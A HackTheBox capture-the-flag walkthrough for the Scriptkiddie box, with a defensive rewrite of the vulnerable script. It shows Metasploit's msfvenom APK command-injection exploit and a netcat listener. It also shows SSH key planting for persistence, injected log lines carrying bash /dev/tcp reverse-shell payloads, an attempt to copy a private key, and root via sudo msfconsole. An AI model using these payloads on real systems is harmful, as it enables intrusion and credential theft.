HackTheBox - Scriptkiddie

Morten Hansen • January 30, 2022

Scriptkiddie

Keywords: metasploit, command injection

IP: 10.10.10.226

NMAP
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open 10.10.10.226:5000 in a web browser. The site offers a number of script-kiddie tools built around Metasploit.

After some enumeration we find that the msfvenom form is exploitable through its Android APK template option.

Some research turns up Rapid7's module for it:

msf > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show targets
    ...targets...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > set TARGET < target-id >
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show options
    ...show and set options...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > exploit

This creates an APK file we can upload to the website. First find our own IP and start a listener with sudo nc -lvnp 1337; then run the script and we get a reverse connection.

We land as user kid and can read the user.txt flag. For a more stable shell, append the public SSH key from your own computer to /home/kid/.ssh/authorized_keys, e.g. echo "<your public key>" >> /home/kid/.ssh/authorized_keys.

We can then ssh in as kid with ssh kid@10.10.10.226; the matching private key on our machine authenticates us.

pwn

We have access to user pwn's home directory. There is a script there that reads the "hackers" file at /home/kid/logs/hackers and processes it with the following command:

#!/bin/bash
log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

The goal is to have a line written to the hackers file as kid so that pwn's script processes it. Then something like 1 2 3; whoami; or 1 2 3; cp /home/pwn/.ssh/id_rsa /tmp/key (the copy does not work here, because pwn's tmp folder is not the same one kid sees).

pwn

1 2 $(bash -c "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1")

1 2 `bash -c "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1"`

This gives us a remote shell as the pwn user. The script seemed to run every second; I did not know why, so I used pspy64 to watch the running processes and see what was going on. It shows that the script is run immediately after something is written to hackers.
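As an added example (my own hardened rewrite, not the box's script), here is how the pwn script above could process the same log safely: validate the third field as an IPv4 literal and pass it to nmap as a separate argument instead of interpolating it into an sh -c string. The function names are mine, and the sample log lines in the checks are constructed.

```shell
#!/bin/sh
# Hardened rewrite of the pwn user's log processor (added example, not the box's script).
# The original interpolates the third log field into sh -c "... ${ip} ...", so any shell
# metacharacters in that field are executed. Here each field is validated as an IPv4
# literal and handed to nmap as one argv element that no shell re-parses.

# Return 0 only for a dotted quad of four 0-255 octets (no empty octets, no other characters).
is_ipv4() {
    ip=$1
    case $ip in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS='.'
    set -- $ip
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Extract the third field onward from each log line, as the original did, and print only
# the entries that pass is_ipv4, deduplicated. Rejected lines go to stderr for review.
extract_targets() {
    while IFS= read -r line; do
        ip=$(printf '%s\n' "$line" | cut -d' ' -f3-)
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log entry: %s\n' "$line" >&2
        fi
    done < "$1" | sort -u
}

# Scan the accepted targets. "$ip" is a single argument; nothing here is shell-parsed twice.
scan_targets() {
    extract_targets "$1" | while IFS= read -r ip; do
        nmap --top-ports 10 -oN "recon/${ip}.nmap" "$ip" >/dev/null 2>&1 &
    done
}
```

A log line such as 1 2 3; whoami is now reported on stderr and never reaches nmap, while genuine addresses are scanned as before.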

root

Having escalated to the pwn user, run linpeas.sh and find that pwn can run msfconsole with sudo:

sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

Then run sudo msfconsole and we effectively have a root shell: the Metasploit console passes commands such as ls, cat and cd through to the system, so we can traverse the filesystem as root.

Read the root.txt file and submit!